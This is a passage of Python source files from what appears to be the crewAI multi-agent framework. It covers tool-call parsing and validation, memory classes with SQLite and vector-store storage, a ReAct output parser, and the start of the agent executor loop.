return a value (it only ever returns None) result = self._remember_format(result=result) # type: ignore # "_remember_format" of "ToolUsage" does not return a value (it only ever returns None) return result def _should_remember_format(self) -> bool: return self.task.used_tools % self._remember_format_after_usages == 0 def _remember_format(self, result: str) -> None: result = str(result) result += "\n\n" + self._i18n.slice("tools").format( tools=self.tools_description, tool_names=self.tools_names ) return result # type: ignore # No return value expected def _check_tool_repeated_usage( self, calling: Union[ToolCalling, InstructorToolCalling] ) -> None: if not self.tools_handler: return False # type: ignore # No return value expected if last_tool_usage := self.tools_handler.last_used_tool: return (calling.tool_name == last_tool_usage.tool_name) and ( # type: ignore # No return value expected calling.arguments == last_tool_usage.arguments ) def _select_tool(self, tool_name: str) -> BaseTool: order_tools = sorted( self.tools, key=lambda tool: SequenceMatcher( None, tool.name.lower().strip(), tool_name.lower().strip() ).ratio(), reverse=True, ) for tool in order_tools: if ( tool.name.lower().strip() == tool_name.lower().strip() or SequenceMatcher( None, tool.name.lower().strip(), tool_name.lower().strip() ).ratio() > 0.85 ): return tool self.task.increment_tools_errors() if tool_name and tool_name != "": raise Exception( f"Action '{tool_name}' don't exist, these are the only available Actions:\n {self.tools_description}" ) else: raise Exception( f"I forgot the Action name, these are the only available Actions: {self.tools_description}" ) def _render(self) -> str: """Render the tool name and description in plain text.""" descriptions = [] for tool in self.tools: args = { k: {k2: v2 for k2, v2 in v.items() if k2 in ["description", "type"]} for k, v in tool.args.items() } descriptions.append( "\n".join( [ f"Tool Name: {tool.name.lower()}", f"Tool Description: {tool.description}", f"Tool Arguments: {args}", ] ) ) return "\n--\n".join(descriptions) def _is_gpt(self, llm) -> bool: return isinstance(llm, ChatOpenAI) and llm.openai_api_base is None def _tool_calling( self, tool_string: str ) -> Union[ToolCalling, InstructorToolCalling]: try: if self.function_calling_llm: model = ( InstructorToolCalling if self._is_gpt(self.function_calling_llm) else ToolCalling ) converter = Converter( text=f"Only tools available:\n###\n{self._render()}\n\nReturn a valid schema for the tool, the tool name must be exactly equal one of the options, use this text to inform the valid output schema:\n\n{tool_string}```", llm=self.function_calling_llm, model=model, instructions=dedent( """\ The schema should have the following structure, only two keys: - tool_name: str - arguments: dict (with all arguments being passed) Example: {"tool_name": "tool name", "arguments": {"arg_name1": "value", "arg_name2": 2}}""", ), max_attempts=1, ) calling = converter.to_pydantic() if isinstance(calling, ConverterError): raise calling else: tool_name = self.action.tool tool = self._select_tool(tool_name) try: tool_input = self._validate_tool_input(self.action.tool_input) arguments = ast.literal_eval(tool_input) except Exception: return ToolUsageErrorException( # type: ignore # Incompatible return value type (got "ToolUsageErrorException", expected "ToolCalling | InstructorToolCalling") f'{self._i18n.errors("tool_arguments_error")}' ) if not isinstance(arguments, dict): return ToolUsageErrorException( # type: ignore # Incompatible return value type (got "ToolUsageErrorException", expected "ToolCalling | InstructorToolCalling") f'{self._i18n.errors("tool_arguments_error")}' ) calling = ToolCalling( tool_name=tool.name, arguments=arguments, log=tool_string, # type: ignore ) except Exception as e: self._run_attempts += 1 if self._run_attempts > self._max_parsing_attempts: self._telemetry.tool_usage_error(llm=self.function_calling_llm) self.task.increment_tools_errors() if self.agent.verbose: self._printer.print(content=f"\n\n{e}\n", color="red") return ToolUsageErrorException( # type: ignore # Incompatible return value type (got "ToolUsageErrorException", expected "ToolCalling | InstructorToolCalling") f'{self._i18n.errors("tool_usage_error").format(error=e)}\nMoving on then. {self._i18n.slice("format").format(tool_names=self.tools_names)}' ) return self._tool_calling(tool_string) return calling def _validate_tool_input(self, tool_input: str) -> str: try: ast.literal_eval(tool_input) return tool_input except Exception: # Clean and ensure the string is properly enclosed in braces tool_input = tool_input.strip() if not tool_input.startswith("{"): tool_input = "{" + tool_input if not tool_input.endswith("}"): tool_input += "}" # Manually split the input into key-value pairs entries = tool_input.strip("{} ").split(",") formatted_entries = [] for entry in entries: if ":" not in entry: continue # Skip malformed entries key, value = entry.split(":", 1) # Remove extraneous white spaces and quotes, replace single quotes key = key.strip().strip('"').replace("'", '"') value = value.strip() # Handle replacement of single quotes at the start and end of the value string if value.startswith("'") and value.endswith("'"): value = value[1:-1] # Remove single quotes value = ( '"' + value.replace('"', '\\"') + '"' ) # Re-encapsulate with double quotes elif value.isdigit(): # Check if value is a digit, hence integer value = value elif value.lower() in [ "true", "false", "null", ]: # Check for boolean and null values value = value.lower() else: # Assume the value is a string and needs quotes value = '"' + value.replace('"', '\\"') + '"' # Rebuild the entry with proper quoting formatted_entry = f'"{key}": {value}' formatted_entries.append(formatted_entry) # Reconstruct the JSON string new_json_string = "{" + ", ".join(formatted_entries) + "}" return new_json_string File: src/crewai/tools/agent_tools.py from langchain.tools import StructuredTool from crewai.agents.agent_builder.utilities.base_agent_tool import BaseAgentTools class AgentTools(BaseAgentTools): """Default tools around agent delegation""" def tools(self): coworkers = ", ".join([f"{agent.role}" for agent in self.agents]) tools = [ StructuredTool.from_function( func=self.delegate_work, name="Delegate work to coworker", description=self.i18n.tools("delegate_work").format( coworkers=coworkers ), ), StructuredTool.from_function( func=self.ask_question, name="Ask question to coworker", description=self.i18n.tools("ask_question").format(coworkers=coworkers), ), ] return tools File: src/crewai/tools/tool_calling.py from typing import Any, Dict, Optional from pydantic import BaseModel, Field from pydantic import BaseModel as PydanticBaseModel from pydantic import Field as PydanticField class ToolCalling(BaseModel): tool_name: str = Field(..., description="The name of the tool to be called.") arguments: Optional[Dict[str, Any]] = Field( ..., description="A dictionary of arguments to be passed to the tool." ) class InstructorToolCalling(PydanticBaseModel): tool_name: str = PydanticField( ..., description="The name of the tool to be called." ) arguments: Optional[Dict[str, Any]] = PydanticField( ..., description="A dictionary of arguments to be passed to the tool." ) File: src/crewai/types/__init__.py File: src/crewai/types/usage_metrics.py from pydantic import BaseModel, Field class UsageMetrics(BaseModel): """ Model to track usage metrics for the crew's execution. Attributes: total_tokens: Total number of tokens used. prompt_tokens: Number of tokens used in prompts. completion_tokens: Number of tokens used in completions. successful_requests: Number of successful requests made. """ total_tokens: int = Field(default=0, description="Total number of tokens used.") prompt_tokens: int = Field( default=0, description="Number of tokens used in prompts." ) completion_tokens: int = Field( default=0, description="Number of tokens used in completions." ) successful_requests: int = Field( default=0, description="Number of successful requests made." ) def add_usage_metrics(self, usage_metrics: "UsageMetrics"): """ Add the usage metrics from another UsageMetrics object. Args: usage_metrics (UsageMetrics): The usage metrics to add. """ self.total_tokens += usage_metrics.total_tokens self.prompt_tokens += usage_metrics.prompt_tokens self.completion_tokens += usage_metrics.completion_tokens self.successful_requests += usage_metrics.successful_requests File: src/crewai/memory/memory.py from typing import Any, Dict, Optional from crewai.memory.storage.interface import Storage class Memory: """ Base class for memory, now supporting agent tags and generic metadata. """ def __init__(self, storage: Storage): self.storage = storage def save( self, value: Any, metadata: Optional[Dict[str, Any]] = None, agent: Optional[str] = None, ) -> None: metadata = metadata or {} if agent: metadata["agent"] = agent self.storage.save(value, metadata) def search(self, query: str) -> Dict[str, Any]: return self.storage.search(query) File: src/crewai/memory/__init__.py from .entity.entity_memory import EntityMemory from .long_term.long_term_memory import LongTermMemory from .short_term.short_term_memory import ShortTermMemory __all__ = ["EntityMemory", "LongTermMemory", "ShortTermMemory"] File: src/crewai/memory/short_term/short_term_memory.py from typing import Any, Dict, Optional from crewai.memory.memory import Memory from crewai.memory.short_term.short_term_memory_item import ShortTermMemoryItem from crewai.memory.storage.rag_storage import RAGStorage class ShortTermMemory(Memory): """ ShortTermMemory class for managing transient data related to immediate tasks and interactions. Inherits from the Memory class and utilizes an instance of a class that adheres to the Storage for data storage, specifically working with MemoryItem instances. """ def __init__(self, crew=None, embedder_config=None): storage = RAGStorage( type="short_term", embedder_config=embedder_config, crew=crew ) super().__init__(storage) def save( self, value: Any, metadata: Optional[Dict[str, Any]] = None, agent: Optional[str] = None, ) -> None: item = ShortTermMemoryItem(data=value, metadata=metadata, agent=agent) super().save(value=item.data, metadata=item.metadata, agent=item.agent) def search(self, query: str, score_threshold: float = 0.35): return self.storage.search(query=query, score_threshold=score_threshold) # type: ignore # BUG? The reference is to the parent class, but the parent class does not have this parameters def reset(self) -> None: try: self.storage.reset() except Exception as e: raise Exception( f"An error occurred while resetting the short-term memory: {e}" ) File: src/crewai/memory/short_term/__init__.py File: src/crewai/memory/short_term/short_term_memory_item.py from typing import Any, Dict, Optional class ShortTermMemoryItem: def __init__( self, data: Any, agent: Optional[str] = None, metadata: Optional[Dict[str, Any]] = None, ): self.data = data self.agent = agent self.metadata = metadata if metadata is not None else {} File: src/crewai/memory/long_term/long_term_memory_item.py from typing import Any, Dict, Optional, Union class LongTermMemoryItem: def __init__( self, agent: str, task: str, expected_output: str, datetime: str, quality: Optional[Union[int, float]] = None, metadata: Optional[Dict[str, Any]] = None, ): self.task = task self.agent = agent self.quality = quality self.datetime = datetime self.expected_output = expected_output self.metadata = metadata if metadata is not None else {} File: src/crewai/memory/long_term/__init__.py File: src/crewai/memory/long_term/long_term_memory.py from typing import Any, Dict from crewai.memory.long_term.long_term_memory_item import LongTermMemoryItem from crewai.memory.memory import Memory from crewai.memory.storage.ltm_sqlite_storage import LTMSQLiteStorage class LongTermMemory(Memory): """ LongTermMemory class for managing cross runs data related to overall crew's execution and performance. Inherits from the Memory class and utilizes an instance of a class that adheres to the Storage for data storage, specifically working with LongTermMemoryItem instances. """ def __init__(self): storage = LTMSQLiteStorage() super().__init__(storage) def save(self, item: LongTermMemoryItem) -> None: # type: ignore # BUG?: Signature of "save" incompatible with supertype "Memory" metadata = item.metadata metadata.update({"agent": item.agent, "expected_output": item.expected_output}) self.storage.save( # type: ignore # BUG?: Unexpected keyword argument "task_description","score","datetime" for "save" of "Storage" task_description=item.task, score=metadata["quality"], metadata=metadata, datetime=item.datetime, ) def search(self, task: str, latest_n: int = 3) -> Dict[str, Any]: return self.storage.load(task, latest_n) # type: ignore # BUG?: "Storage" has no attribute "load" def reset(self) -> None: self.storage.reset() File: src/crewai/memory/contextual/__init__.py File: src/crewai/memory/contextual/contextual_memory.py from typing import Optional from crewai.memory import EntityMemory, LongTermMemory, ShortTermMemory class ContextualMemory: def __init__(self, stm: ShortTermMemory, ltm: LongTermMemory, em: EntityMemory): self.stm = stm self.ltm = ltm self.em = em def build_context_for_task(self, task, context) -> str: """ Automatically builds a minimal, highly relevant set of contextual information for a given task. """ query = f"{task.description} {context}".strip() if query == "": return "" context = [] context.append(self._fetch_ltm_context(task.description)) context.append(self._fetch_stm_context(query)) context.append(self._fetch_entity_context(query)) return "\n".join(filter(None, context)) def _fetch_stm_context(self, query) -> str: """ Fetches recent relevant insights from STM related to the task's description and expected_output, formatted as bullet points. """ stm_results = self.stm.search(query) formatted_results = "\n".join([f"- {result}" for result in stm_results]) return f"Recent Insights:\n{formatted_results}" if stm_results else "" def _fetch_ltm_context(self, task) -> Optional[str]: """ Fetches historical data or insights from LTM that are relevant to the task's description and expected_output, formatted as bullet points. """ ltm_results = self.ltm.search(task, latest_n=2) if not ltm_results: return None formatted_results = [ suggestion for result in ltm_results for suggestion in result["metadata"]["suggestions"] # type: ignore # Invalid index type "str" for "str"; expected type "SupportsIndex | slice" ] formatted_results = list(dict.fromkeys(formatted_results)) formatted_results = "\n".join([f"- {result}" for result in formatted_results]) # type: ignore # Incompatible types in assignment (expression has type "str", variable has type "list[str]") return f"Historical Data:\n{formatted_results}" if ltm_results else "" def _fetch_entity_context(self, query) -> str: """ Fetches relevant entity information from Entity Memory related to the task's description and expected_output, formatted as bullet points. """ em_results = self.em.search(query) formatted_results = "\n".join( [f"- {result['context']}" for result in em_results] # type: ignore # Invalid index type "str" for "str"; expected type "SupportsIndex | slice" ) return f"Entities:\n{formatted_results}" if em_results else "" File: src/crewai/memory/entity/entity_memory.py from crewai.memory.entity.entity_memory_item import EntityMemoryItem from crewai.memory.memory import Memory from crewai.memory.storage.rag_storage import RAGStorage class EntityMemory(Memory): """ EntityMemory class for managing structured information about entities and their relationships using SQLite storage. Inherits from the Memory class. """ def __init__(self, crew=None, embedder_config=None): storage = RAGStorage( type="entities", allow_reset=False, embedder_config=embedder_config, crew=crew, ) super().__init__(storage) def save(self, item: EntityMemoryItem) -> None: # type: ignore # BUG?: Signature of "save" incompatible with supertype "Memory" """Saves an entity item into the SQLite storage.""" data = f"{item.name}({item.type}): {item.description}" super().save(data, item.metadata) def reset(self) -> None: try: self.storage.reset() except Exception as e: raise Exception(f"An error occurred while resetting the entity memory: {e}") File: src/crewai/memory/entity/__init__.py File: src/crewai/memory/entity/entity_memory_item.py class EntityMemoryItem: def __init__( self, name: str, type: str, description: str, relationships: str, ): self.name = name self.type = type self.description = description self.metadata = {"relationships": relationships} File: src/crewai/memory/storage/interface.py from typing import Any, Dict class Storage: """Abstract base class defining the storage interface""" def save(self, value: Any, metadata: Dict[str, Any]) -> None: pass def search(self, key: str) -> Dict[str, Any]: # type: ignore pass def reset(self) -> None: pass File: src/crewai/memory/storage/ltm_sqlite_storage.py import json import sqlite3 from typing import Any, Dict, List, Optional, Union from crewai.utilities import Printer from crewai.utilities.paths import db_storage_path class LTMSQLiteStorage: """ An updated SQLite storage class for LTM data storage. """ def __init__( self, db_path: str = f"{db_storage_path()}/long_term_memory_storage.db" ) -> None: self.db_path = db_path self._printer: Printer = Printer() self._initialize_db() def _initialize_db(self): """ Initializes the SQLite database and creates LTM table """ try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute( """ CREATE TABLE IF NOT EXISTS long_term_memories ( id INTEGER PRIMARY KEY AUTOINCREMENT, task_description TEXT, metadata TEXT, datetime TEXT, score REAL ) """ ) conn.commit() except sqlite3.Error as e: self._printer.print( content=f"MEMORY ERROR: An error occurred during database initialization: {e}", color="red", ) def save( self, task_description: str, metadata: Dict[str, Any], datetime: str, score: Union[int, float], ) -> None: """Saves data to the LTM table with error handling.""" try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute( """ INSERT INTO long_term_memories (task_description, metadata, datetime, score) VALUES (?, ?, ?, ?) """, (task_description, json.dumps(metadata), datetime, score), ) conn.commit() except sqlite3.Error as e: self._printer.print( content=f"MEMORY ERROR: An error occurred while saving to LTM: {e}", color="red", ) def load( self, task_description: str, latest_n: int ) -> Optional[List[Dict[str, Any]]]: """Queries the LTM table by task description with error handling.""" try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute( f""" SELECT metadata, datetime, score FROM long_term_memories WHERE task_description = ? ORDER BY datetime DESC, score ASC LIMIT {latest_n} """, (task_description,), ) rows = cursor.fetchall() if rows: return [ { "metadata": json.loads(row[0]), "datetime": row[1], "score": row[2], } for row in rows ] except sqlite3.Error as e: self._printer.print( content=f"MEMORY ERROR: An error occurred while querying LTM: {e}", color="red", ) return None def reset( self, ) -> None: """Resets the LTM table with error handling.""" try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute("DELETE FROM long_term_memories") conn.commit() except sqlite3.Error as e: self._printer.print( content=f"MEMORY ERROR: An error occurred while deleting all rows in LTM: {e}", color="red", ) return None File: src/crewai/memory/storage/kickoff_task_outputs_storage.py import json import sqlite3 from typing import Any, Dict, List, Optional from crewai.task import Task from crewai.utilities import Printer from crewai.utilities.crew_json_encoder import CrewJSONEncoder from crewai.utilities.paths import db_storage_path class KickoffTaskOutputsSQLiteStorage: """ An updated SQLite storage class for kickoff task outputs storage. """ def __init__( self, db_path: str = f"{db_storage_path()}/latest_kickoff_task_outputs.db" ) -> None: self.db_path = db_path self._printer: Printer = Printer() self._initialize_db() def _initialize_db(self): """ Initializes the SQLite database and creates LTM table """ try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute( """ CREATE TABLE IF NOT EXISTS latest_kickoff_task_outputs ( task_id TEXT PRIMARY KEY, expected_output TEXT, output JSON, task_index INTEGER, inputs JSON, was_replayed BOOLEAN, timestamp DATETIME DEFAULT CURRENT_TIMESTAMP ) """ ) conn.commit() except sqlite3.Error as e: self._printer.print( content=f"SAVING KICKOFF TASK OUTPUTS ERROR: An error occurred during database initialization: {e}", color="red", ) def add( self, task: Task, output: Dict[str, Any], task_index: int, was_replayed: bool = False, inputs: Dict[str, Any] = {}, ): try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute( """ INSERT OR REPLACE INTO latest_kickoff_task_outputs (task_id, expected_output, output, task_index, inputs, was_replayed) VALUES (?, ?, ?, ?, ?, ?) """, ( str(task.id), task.expected_output, json.dumps(output, cls=CrewJSONEncoder), task_index, json.dumps(inputs), was_replayed, ), ) conn.commit() except sqlite3.Error as e: self._printer.print( content=f"SAVING KICKOFF TASK OUTPUTS ERROR: An error occurred during database initialization: {e}", color="red", ) def update( self, task_index: int, **kwargs, ): """ Updates an existing row in the latest_kickoff_task_outputs table based on task_index. """ try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() fields = [] values = [] for key, value in kwargs.items(): fields.append(f"{key} = ?") values.append( json.dumps(value, cls=CrewJSONEncoder) if isinstance(value, dict) else value ) query = f"UPDATE latest_kickoff_task_outputs SET {', '.join(fields)} WHERE task_index = ?" values.append(task_index) cursor.execute(query, tuple(values)) conn.commit() if cursor.rowcount == 0: self._printer.print( f"No row found with task_index {task_index}. No update performed.", color="red", ) except sqlite3.Error as e: self._printer.print(f"UPDATE KICKOFF TASK OUTPUTS ERROR: {e}", color="red") def load(self) -> Optional[List[Dict[str, Any]]]: try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute(""" SELECT * FROM latest_kickoff_task_outputs ORDER BY task_index """) rows = cursor.fetchall() results = [] for row in rows: result = { "task_id": row[0], "expected_output": row[1], "output": json.loads(row[2]), "task_index": row[3], "inputs": json.loads(row[4]), "was_replayed": row[5], "timestamp": row[6], } results.append(result) return results except sqlite3.Error as e: self._printer.print( content=f"LOADING KICKOFF TASK OUTPUTS ERROR: An error occurred while querying kickoff task outputs: {e}", color="red", ) return None def delete_all(self): """ Deletes all rows from the latest_kickoff_task_outputs table. """ try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute("DELETE FROM latest_kickoff_task_outputs") conn.commit() except sqlite3.Error as e: self._printer.print( content=f"ERROR: Failed to delete all kickoff task outputs: {e}", color="red", ) File: src/crewai/memory/storage/rag_storage.py import contextlib import io import logging import os import shutil from typing import Any, Dict, List, Optional from embedchain import App from embedchain.llm.base import BaseLlm from embedchain.models.data_type import DataType from embedchain.vectordb.chroma import InvalidDimensionException from crewai.memory.storage.interface import Storage from crewai.utilities.paths import db_storage_path @contextlib.contextmanager def suppress_logging( logger_name="chromadb.segment.impl.vector.local_persistent_hnsw", level=logging.ERROR, ): logger = logging.getLogger(logger_name) original_level = logger.getEffectiveLevel() logger.setLevel(level) with contextlib.redirect_stdout(io.StringIO()), contextlib.redirect_stderr( io.StringIO() ), contextlib.suppress(UserWarning): yield logger.setLevel(original_level) class FakeLLM(BaseLlm): pass class RAGStorage(Storage): """ Extends Storage to handle embeddings for memory entries, improving search efficiency. """ def __init__(self, type, allow_reset=True, embedder_config=None, crew=None): super().__init__() if ( not os.getenv("OPENAI_API_KEY") and not os.getenv("OPENAI_BASE_URL") == "https://api.openai.com/v1" ): os.environ["OPENAI_API_KEY"] = "fake" agents = crew.agents if crew else [] agents = [self._sanitize_role(agent.role) for agent in agents] agents = "_".join(agents) config = { "app": { "config": {"name": type, "collect_metrics": False, "log_level": "ERROR"} }, "chunker": { "chunk_size": 5000, "chunk_overlap": 100, "length_function": "len", "min_chunk_size": 150, }, "vectordb": { "provider": "chroma", "config": { "collection_name": type, "dir": f"{db_storage_path()}/{type}/{agents}", "allow_reset": allow_reset, }, }, } if embedder_config: config["embedder"] = embedder_config self.type = type self.app = App.from_config(config=config) self.app.llm = FakeLLM() if allow_reset: self.app.reset() def _sanitize_role(self, role: str) -> str: """ Sanitizes agent roles to ensure valid directory names. """ return role.replace("\n", "").replace(" ", "_").replace("/", "_") def save(self, value: Any, metadata: Dict[str, Any]) -> None: self._generate_embedding(value, metadata) def search( # type: ignore # BUG?: Signature of "search" incompatible with supertype "Storage" self, query: str, limit: int = 3, filter: Optional[dict] = None, score_threshold: float = 0.35, ) -> List[Any]: with suppress_logging(): try: results = ( self.app.search(query, limit, where=filter) if filter else self.app.search(query, limit) ) except InvalidDimensionException: self.app.reset() return [] return [r for r in results if r["metadata"]["score"] >= score_threshold] def _generate_embedding(self, text: str, metadata: Dict[str, Any]) -> Any: self.app.add(text, data_type=DataType.TEXT, metadata=metadata) def reset(self) -> None: try: shutil.rmtree(f"{db_storage_path()}/{self.type}") except Exception as e: raise Exception( f"An error occurred while resetting the {self.type} memory: {e}" ) File: src/crewai/agents/__init__.py from .cache.cache_handler import CacheHandler from .executor import CrewAgentExecutor from .parser import CrewAgentParser from .tools_handler import ToolsHandler __all__ = ["CacheHandler", "CrewAgentExecutor", "CrewAgentParser", "ToolsHandler"] File: src/crewai/agents/parser.py import re from typing import Any, Union from json_repair import repair_json from langchain.agents.output_parsers import ReActSingleInputOutputParser from langchain_core.agents import AgentAction, AgentFinish from langchain_core.exceptions import OutputParserException from crewai.utilities import I18N FINAL_ANSWER_ACTION = "Final Answer:" MISSING_ACTION_AFTER_THOUGHT_ERROR_MESSAGE = "I did it wrong. Invalid Format: I missed the 'Action:' after 'Thought:'. I will do right next, and don't use a tool I have already used.\n" MISSING_ACTION_INPUT_AFTER_ACTION_ERROR_MESSAGE = "I did it wrong. Invalid Format: I missed the 'Action Input:' after 'Action:'. I will do right next, and don't use a tool I have already used.\n" FINAL_ANSWER_AND_PARSABLE_ACTION_ERROR_MESSAGE = "I did it wrong. Tried to both perform Action and give a Final Answer at the same time, I must do one or the other" class CrewAgentParser(ReActSingleInputOutputParser): """Parses ReAct-style LLM calls that have a single tool input. Expects output to be in one of two formats. If the output signals that an action should be taken, should be in the below format. This will result in an AgentAction being returned. Thought: agent thought here Action: search Action Input: what is the temperature in SF? If the output signals that a final answer should be given, should be in the below format. This will result in an AgentFinish being returned. Thought: agent thought here Final Answer: The temperature is 100 degrees """ _i18n: I18N = I18N() agent: Any = None def parse(self, text: str) -> Union[AgentAction, AgentFinish]: includes_answer = FINAL_ANSWER_ACTION in text regex = ( r"Action\s*\d*\s*:[\s]*(.*?)[\s]*Action\s*\d*\s*Input\s*\d*\s*:[\s]*(.*)" ) action_match = re.search(regex, text, re.DOTALL) if action_match: if includes_answer: raise OutputParserException( f"{FINAL_ANSWER_AND_PARSABLE_ACTION_ERROR_MESSAGE}: {text}" ) action = action_match.group(1) clean_action = self._clean_action(action) action_input = action_match.group(2).strip() tool_input = action_input.strip(" ").strip('"') safe_tool_input = self._safe_repair_json(tool_input) return AgentAction(clean_action, safe_tool_input, text) elif includes_answer: return AgentFinish( {"output": text.split(FINAL_ANSWER_ACTION)[-1].strip()}, text ) if not re.search(r"Action\s*\d*\s*:[\s]*(.*?)", text, re.DOTALL): self.agent.increment_formatting_errors() raise OutputParserException( f"Could not parse LLM output: `{text}`", observation=f"{MISSING_ACTION_AFTER_THOUGHT_ERROR_MESSAGE}\n{self._i18n.slice('final_answer_format')}", llm_output=text, send_to_llm=True, ) elif not re.search( r"[\s]*Action\s*\d*\s*Input\s*\d*\s*:[\s]*(.*)", text, re.DOTALL ): self.agent.increment_formatting_errors() raise OutputParserException( f"Could not parse LLM output: `{text}`", observation=MISSING_ACTION_INPUT_AFTER_ACTION_ERROR_MESSAGE, llm_output=text, send_to_llm=True, ) else: format = self._i18n.slice("format_without_tools") error = f"{format}" self.agent.increment_formatting_errors() raise OutputParserException( error, observation=error, llm_output=text, send_to_llm=True, ) def _clean_action(self, text: str) -> str: """Clean action string by removing non-essential formatting characters.""" return re.sub(r"^\s*\*+\s*|\s*\*+\s*$", "", text).strip() def _safe_repair_json(self, tool_input: str) -> str: UNABLE_TO_REPAIR_JSON_RESULTS = ['""', "{}"] # Skip repair if the input starts and ends with square brackets # Explanation: The JSON parser has issues handling inputs that are enclosed in square brackets ('[]'). # These are typically valid JSON arrays or strings that do not require repair. Attempting to repair such inputs # might lead to unintended alterations, such as wrapping the entire input in additional layers or modifying # the structure in a way that changes its meaning. By skipping the repair for inputs that start and end with # square brackets, we preserve the integrity of these valid JSON structures and avoid unnecessary modifications. if tool_input.startswith("[") and tool_input.endswith("]"): return tool_input # Before repair, handle common LLM issues: # 1. Replace """ with " to avoid JSON parser errors tool_input = tool_input.replace('"""', '"') result = repair_json(tool_input) if result in UNABLE_TO_REPAIR_JSON_RESULTS: return tool_input return str(result) File: src/crewai/agents/tools_handler.py from typing import Any, Optional, Union from ..tools.cache_tools import CacheTools from ..tools.tool_calling import InstructorToolCalling, ToolCalling from .cache.cache_handler import CacheHandler class ToolsHandler: """Callback handler for tool usage.""" last_used_tool: ToolCalling = {} # type: ignore # BUG?: Incompatible types in assignment (expression has type "Dict[...]", variable has type "ToolCalling") cache: Optional[CacheHandler] def __init__(self, cache: Optional[CacheHandler] = None): """Initialize the callback handler.""" self.cache = cache self.last_used_tool = {} # type: ignore # BUG?: same as above def on_tool_use( self, calling: Union[ToolCalling, InstructorToolCalling], output: str, should_cache: bool = True, ) -> Any: """Run when tool ends running.""" self.last_used_tool = calling # type: ignore # BUG?: Incompatible types in assignment (expression has type "Union[ToolCalling, InstructorToolCalling]", variable has type "ToolCalling") if self.cache and should_cache and calling.tool_name != CacheTools().name: self.cache.add( tool=calling.tool_name, input=calling.arguments, output=output, ) File: src/crewai/agents/executor.py import threading import time from typing import Any, Dict, Iterator, List, Literal, Optional, Tuple, Union import click from langchain.agents import AgentExecutor from langchain.agents.agent import ExceptionTool from langchain.callbacks.manager import CallbackManagerForChainRun from langchain.chains.summarize import load_summarize_chain from langchain.text_splitter import RecursiveCharacterTextSplitter from langchain_core.agents import AgentAction, AgentFinish, AgentStep from langchain_core.exceptions import OutputParserException from langchain_core.tools import BaseTool from langchain_core.utils.input import get_color_mapping from pydantic import InstanceOf from crewai.agents.agent_builder.base_agent_executor_mixin import CrewAgentExecutorMixin from crewai.agents.tools_handler import ToolsHandler from crewai.tools.tool_usage import ToolUsage, ToolUsageErrorException from crewai.utilities import I18N from crewai.utilities.constants import TRAINING_DATA_FILE from crewai.utilities.exceptions.context_window_exceeding_exception import ( LLMContextLengthExceededException, ) from crewai.utilities.logger import Logger from crewai.utilities.training_handler import CrewTrainingHandler class CrewAgentExecutor(AgentExecutor, CrewAgentExecutorMixin): _i18n: I18N = I18N() should_ask_for_human_input: bool = False llm: Any = None iterations: int = 0 task: Any = None tools_description: str = "" tools_names: str = "" original_tools: List[Any] = [] crew_agent: Any = None crew: Any = None function_calling_llm: Any = None request_within_rpm_limit: Any = None tools_handler: Optional[InstanceOf[ToolsHandler]] = None max_iterations: Optional[int] = 15 have_forced_answer: bool = False force_answer_max_iterations: Optional[int] = None # type: ignore # Incompatible types in assignment (expression has type "int | None", base class "CrewAgentExecutorMixin" defined the type as "int") step_callback: Optional[Any] = None system_template: Optional[str] = None prompt_template: Optional[str] = None response_template: Optional[str] = None _logger: Logger = Logger() _fit_context_window_strategy: Optional[Literal["summarize"]] = "summarize" def _call( self, inputs: Dict[str, str], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> Dict[str, Any]: """Run text through and get agent response.""" # Construct a mapping of tool name to tool for easy lookup name_to_tool_map = {tool.name: tool for tool in self.tools} # We construct a mapping from each tool to a color, used for logging. color_mapping = get_color_mapping( [tool.name.casefold() for tool in self.tools], excluded_colors=["green", "red"], ) intermediate_steps: List[Tuple[AgentAction, str]] = [] # Allowing human input given task setting if self.task and self.task.human_input: self.should_ask_for_human_input = True # Let's start tracking the number of iterations and time elapsed self.iterations = 0 time_elapsed = 0.0 start_time = time.time() # We now enter the agent loop (until it returns something). while self._should_continue(self.iterations, time_elapsed): if not self.request_within_rpm_limit or self.request_within_rpm_limit(): next_step_output = self._take_next_step( name_to_tool_map, color_mapping, inputs, intermediate_steps, run_manager=run_manager, ) if self.step_callback: self.step_callback(next_step_output) if isinstance(next_step_output, AgentFinish): # Creating long term memory create_long_term_memory = threading.Thread( target=self._create_long_term_memory, args=(next_step_output,) ) create_long_term_memory.start() return self._return( next_step_output, intermediate_steps, run_manager=run_manager ) intermediate_steps.extend(next_step_output) if len(next_step_output) == 1: next_step_action = next_step_output[0] # See if tool should return directly tool_return = self._get_tool_return(next_step_action) if tool_return is not None: return self._return( tool_return, intermediate_steps, run_manager=run_manager ) self.iterations += 1 time_elapsed = time.time() - start_time output = self.agent.return_stopped_response( self.early_stopping_method, intermediate_steps, **inputs ) return self._return(output, intermediate_steps, run_manager=run_manager) def _iter_next_step( self, name_to_tool_map: Dict[str, BaseTool], color_mapping: Dict[str, str], inputs: Dict[str, str], intermediate_steps: List[Tuple[AgentAction, str]], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> Iterator[Union[AgentFinish, AgentAction, AgentStep]]: """Take a single step in the thought-action-observation loop. Override this to take control of how the agent makes and acts on choices. """ try: if self._should_force_answer(): error = self._i18n.errors("force_final_answer") output = AgentAction("_Exception", error, error) self.have_forced_answer = True yield AgentStep(action=output, observation=error) return intermediate_steps = self._prepare_intermediate_steps(intermediate_steps) # Call the LLM to see what to do. output = self.agent.plan( intermediate_steps, callbacks=run_manager.get_child() if run_manager else None, **inputs, ) except OutputParserException as e: if isinstance(self.handle_parsing_errors, bool): raise_error = not self.handle_parsing_errors else: raise_error = False if raise_error: raise ValueError( "An output parsing error occurred. " "In order to pass this error back to the agent and have it try " "again, pass `handle_parsing_errors=True` to the AgentExecutor. " f"This is the error: {str(e)}" ) str(e) if isinstance(self.handle_parsing_errors, bool): if e.send_to_llm: observation = f"\n{str(e.observation)}" str(e.llm_output) else: observation = "" elif isinstance(self.handle_parsing_errors, str): observation = 